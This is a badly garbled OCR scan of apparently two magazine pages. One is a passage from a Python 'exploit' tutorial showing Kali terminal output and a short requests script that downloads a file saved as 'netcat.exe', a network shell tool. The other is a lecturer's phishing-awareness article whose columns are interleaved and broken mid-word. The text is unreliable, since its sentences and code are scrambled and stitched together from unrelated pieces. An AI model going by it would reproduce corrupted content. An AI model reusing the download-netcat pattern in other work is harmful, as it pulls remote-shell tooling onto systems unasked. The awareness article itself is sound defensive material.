2 vm)-[-/pythonexploit
first_ exploit
-/pythonexploit
L -$Is
archive.zip copied_ expl
oit_ 2 netcat.exe
copied_ expl t firstex ploit
oi
2 2 2 vm)-[-/pythonexploit
~/python_ exploit
[
— ( kali® 2 2 2 vm )-[-/python ex ploit]
*— $ f ile netcat.exe
netcat.exe: Zip archive data, at least v2 .0 to extract, compress
ion m ethod=defl ate
r ~/python_ exploit
Ili
sstored asnetcat.exeasIhavespecified thatnamefori
t. N otethati
tst
il
lisazi
parchive. Y ou
analso importthereq uestfuncti
onasshow nbel ow .
GNU nano 7 . 2 f irst e x p l o i t I
UR L="
H el
p W rite O ut E xecute
E xit R ead File Ju stify
2 )wgetm odul
e
Y oual
) know w getright? Y es. Iam talkingaboutthepopularbinary thati
sused t
o dow nload fi
l-
49
50
GNU nano 7 .2
i
m port requests
UR L="httos://et
open(
"netcat 3 .exe, "wb").w rite(resu lt.content)|
H el
p W rite O utHJ W here I s Cut E xecute
E xit R ead Fil
eB S R epl ace J P aste Ju stify
-[~/python_ exploit
r
-[-/python exploit
L
Inournext ssue. w ew i
llbecombining al lthepython moduleslearntinPart1, Part2and ’art
-3
and explaintoyou how they w i
llbe usefuli
nexploit.
P hishing scam s: 7 safety tips from a cybersecurity ex pert
ON L IN E SECUR ITY
Thembekile OliviaMayayise o anonlineplatform, from w hich rank bought
SeniorL ecturer,T Universit
y
/of the R 6,(
)(
)(
) (aboutUS$32.5) w orth of gi
ftvouchers.
W itw atersrand Once he'd sentthecodeshereceived asecond
emailfrom the <boss= req uesting one morevouc
R ecently, one of my acq uaintances, 1rank, -her.
received anemaill ateonaMonday afternoonw Atthatpoint, Frank reached outtohi sbossthr
-it
hthesubjectli ne, <Areyou stillintheoffice?= -ough W hatsApp and discovered he’d been dup
Itappeared to comefrom hi smanager, w ho cl ai- ed. frank had fal lenprey t o aphishing scam.
11ed to bestuck i nalong meetingw ithoutthem Thisi sjustone example of many from my ow n
-canst o urgently purchase onlinegi ftvouchersf circles. Otherfriendsand relatives- someof the
-orclients. H e asked forhelp and shared ali nk t
- (C ont’
d on nex tpag e
-m seasoned internetusersw ho know abouttheion, 1 ikeaplione cal linw hich thecallerI alsel ycl
-mportanceof cybersecurity- have also fall enpr-ai mst o be abank offi ci
aland seeksto assi styou
-eyto phishing scams. inresettingyourpassw ord orupdating youracc
Iam acybersecurity professionalw ho conducts o un t d e tails. < )the r c ommo n v ishin g s ca ms c entr
research onand teachesvariouscybersecurity t o -eonofferi ngdiscountsorrew ardsifyoujoin a
pics. InrecentyearsIhavenoticed (and confirvacationclub, provided you discloseyourperso
med through research) thatsome organisationsa nalcreditcard information.
-ndindividualsseem fatigued by cybersecurity a- Socialmediaphishing, meanw hile, happensw h
w arenesseffort s. I
si tpossible thatthey assume -en sca mme r s cre a te fa ke a c co u nts p u rp o rtin g to
mostpeople aretechnologically astuteand cons b e re al p eop le (fo r ins tan c e , p osin g a s Fr an k ’s b -
tantly w el
l-informed? Orcould i tsimply be that oss). They thenstartinteractingw ith therealper
fatiguehassetinbecause of the demanding natu -son’sconnectionsto deceivethem into givingu
-reof cybersecurity aw arenesscampaigns? 1hou- p sen si tive in fo rma t
io n o r p e r fo rmi ng fin anc ial fa
I ihave no definitiveansw er, suspectthe v ours .
latter. W ho i
s b eh in d th ese sc a ms ? y pica l l
y , the se a r
I1i
ereality isthatphishing scamsarehere t o st-eseasoned and cunning scammersw ho haveho
-ayand themethodsemployed i ntheirexecutio- n ed t h e ir skills in th e w or l d o f ph i
s hi n g o v e r an
e xten d ed p e riod . S o me w ro r k alon e; o th e rs b elo
ncontinue toevol ve. Given my expertise and ex
-perience, Iw ould l i
keto offersevent ipsto help ng t o syndicates.
you staysafefrom phishing scams. Thisi sespeci
-allyimportantduring the fest i
veseason aspeopl P hi shi ng skills
-eshop forgi ftsand book holidaysonline. Il ese
activitiescreate more opportunitiesforcybercri S ucc e ssful p h i
s h e r
s h av e a v a riet
y o : sk ill
s . H ie
minalsto netnew vi ctims. H ow ever, thesetipsa- -ycombine psycho ogi calt acti csand technical
reappropriate throughouttheyear. Cybercrimin prow ess.
-alsdon’ttakebreaks- soyou shouldn’teverdr They aremastermanipulators, playing onvi cti
op yourguard. ms’ emotions. Individualsaredeceived into beli
evingthey’vesecured asubstantialsum, oftenm
W hati s phi shing? -ill
ion s , th rou g h a ja ck p o t w in . Th is s c he me false
-lycl ai msthattheircellphonenumberoremail
<Phishing= isastrategy designed to deceivepew asused brent ry. Conseq uently, thevictim do
ople into revealingsensi tiveinformationsuch as esn’tseek clarification. E xcited aboutgetting the
creditcard details, logi ncredentialsand, insom- w ind fa l lp ay me n t q u i
c k l
y , th e y give th ei r pe rso n
einstances, identification numbers. alinformationt o cybercriminals.
The mostcommonform of phishingi sviaema I i esescammerseventailortheirapproach t o
-ikphisherssend fraudulentemailsthatappeart - match individuals'personalbeli efs. Forexample
o befrom legitimatesources. The messagesoft e- if you h a ve an affin ity for a n c estral w o rs hip , be
ncontain l i
nksto fakew ebsi tesdesigned t o steal p rep ar ed for a me s sag e fr o m s ome on e c laimi n g
logi ncredentialsorothersensi tiveinformation. t o be amedium, asserting thatyourgreat -great -
Phesameemailw i llbesentto many addresses. grandfatheri sreq uesting amoney ri tualinvolvin
Phi sherscanobtain emailsfrom placessuch as -gadepositto aparticularaccountand promisin
corporatew ebsi tes, existingdatabreaches, soci al -g mu lt i
p li
ca tio n o i y ou r fu n d s - ev en th o ug h y o
mediaplatforms, businesscardsorotherpublicl- u r an ce stors h ave c o mmu n ic a ted n o s uc h in form
yavailable company documents. -ation.
<’ybercriminalsknow 'thatcasti ng theirnetw i d- L ikew ise, i fyou areadevout ’hri stian, someo
emeansthey’l lsurely catch some. n e cla i mi ng to b e <Pr o p h e t Pr ofit" mi gh t att emp t
V oicephishing (vi shi
ng) i sanotherform of t his t o co n t act y o u th ro ug h a me s sa ging p l
a t form, s u-
scam. H ere, perpetratorsusevoicecommunicati- (C ont ’ d on ne x t pag e )